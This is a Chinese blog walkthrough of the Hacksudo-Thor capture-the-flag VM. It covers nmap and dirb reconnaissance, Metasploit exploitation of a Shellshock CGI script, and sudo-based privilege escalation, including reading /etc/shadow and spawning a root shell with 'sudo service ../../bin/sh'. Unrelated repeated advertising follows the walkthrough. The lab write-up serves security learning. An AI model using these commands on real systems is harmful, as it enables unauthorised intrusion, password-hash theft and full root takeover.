Hacksudo-Thor靶机--详细教学

文章讲述了如何在VirtulaBox和VMware环境中进行网络安全测试,包括IP发现、Web应用评估、PHP和Apache服务器识别、Shellshock漏洞利用以及最终的提权过程。
摘要由CSDN通过智能技术生成

环境

靶机官方下载地址
靶机VirtulaBox: Hacksudo-Thor 192.168.138.9
攻击机VMware : kail 192.168.138.3

VirtulaBox 和 VMware 实现互通

1.将VirtulaBox 的网络设置成 VirtualBox Host-Only

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2.将VMware也设置成VirtualBox Host-Only

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

主机发现信息收集

arp-scan -l -I eth0
在这里插入图片描述
nmap -A -p- -T5 192.168.138.9 -oN /tmp/nmapScan/hacksudo-thor.txt

我们发现开启了web服务,可以访问http://192.168.138.9:80查看一下网站

在这里插入图片描述

web应用程序评估

  • 开发语言?

这个网站通过浏览器的url可以发现是一个php语言开发的

  • 服务器软件?

通过nmap扫描和浏览器插件,我们可以发现服务器软件是Apache Http Server

  • 用途?

发现是一个银行网站

  • 应用系统类型?

通过nmap扫描得出是个linux系统

  • 数据库类型?

暂时没有发现

推荐软件 :Wappalyzer 可以帮你检测当前网站的信息

在这里插入图片描述

目录爆破

dirb 命令参数

格式:dirb <url_base> [<wordlist_file(s)>] [options]
dirb <网站连接> [字典(可以选)] [操作]
-a 设置user-agent
-p <proxy[:port]>设置代理
-c 设置cookie
-z 添加毫秒延迟,避免洪水攻击
-o 输出结果
-X 在每个字典的后面添加一个后缀
-H 添加请求头
-i 不区分大小写搜索

在这里插入图片描述
这里我们发现有个cgi-bin 的目录,我可以可以尝试对这个文件夹进行扫描看看有没有漏洞
dirb http://192.168.138.9/cgi-bin -X .sh
在这里插入图片描述
扫到shell.sh,看看是否有破壳漏洞
``

扫到shell.sh,看看是否有破壳漏洞
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.138.9
–script http-shellshock: http-shellshock 是一个用于检测 Shellshock漏洞的脚本。Shellshock 是一个在 Bash shell 中发现的安全漏洞,允许远程攻击者执行任意代码

在这里插入图片描述
这里nmap扫描出了漏洞直接搜索漏洞

searchsploit shellshock

通过漏洞搜索工具搜索shellshock漏洞
我们发现apache mod_cgi 是存在漏洞的
在这里插入图片描述

通过msf利用漏洞
search shellshock

在这里插入图片描述
use 2
show options
set rhosts 192.168.138.9
set targeturi /cgi-bin/shell.sh
run

在这里插入图片描述
拿到一个meterpreter,我们发现我们拿到了web服务的权限我们要想办法拿到root的权限
shell
id
在这里插入图片描述

提权

sudo -l 查看当前用户的授权情况

这里我们发现有一个thor用户执行的脚本文件的权限
在这里插入图片描述
sudo -u thor /home/thor/./hammer.sh
sudo -u 指定已什么用户执行当前命令,sudo默认是root权限
这里我们发现可以通过thor权限执行命令,这样我们就可以横向拓展得到thor的权限

在这里插入图片描述
/bin/bash 获取thor的shell
python -c "impotr pty;pty.spawn('/bin/bash')"

我们发现得到了thor的用户权限

在这里插入图片描述
sudo -l

这里我们进行查案thor的用户sudo权限,我们发现有root的权限

在这里插入图片描述
sudo -u root cat /etc/shadow

这里我们可以通过查看shaow密码文件,对root密码进行解密
在这里插入图片描述
我们还发现有个service的文件我们可以去https://gtfobins.github.io 网站查找有没有service的相关的提权漏洞,我们发先service存在sudo的提权漏洞

在这里插入图片描述
在这里插入图片描述

sudo service ../../bin/sh

这我们就拿到root权限了!!!!!!

在这里插入图片描述

提权完成!!拿下!!

在这里插入图片描述

  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源
大学生在线租房平台管理系统按照操作主体分为管理员和用户。管理员的功能包括报修管理、报修评价管理、字典管理、房东管理、房屋管理、房屋收藏管理、房屋留言管理、房屋租赁管理、租房论坛管理、公告信息管理、留言板管理、用户管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 大学生在线租房平台管理系统可以提高大学生在线租房平台信息管理问题的解决效率,优化大学生在线租房平台信息处理流程,保证大学生在线租房平台信息数据的安全,它是一个非常可靠,非常安全的应用程序。 管理员权限操作的功能包括管理公告,管理大学生在线租房平台信息,包括房屋管理,培训管理,报修管理,薪资管理等,可以管理公告。 房屋管理界面,管理员在房屋管理界面中可以对界面中显示,可以对房屋信息的房屋状态进行查看,可以添加新的房屋信息等。报修管理界面,管理员在报修管理界面中查看报修种类信息,报修描述信息,新增报修信息等。公告管理界面,管理员在公告管理界面中新增公告,可以删除公告。公告类型管理界面,管理员在公告类型管理界面查看公告的工作状态,可以对公告的数据进行导出,可以添加新公告的信息,可以编辑公告信息,删除公告信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值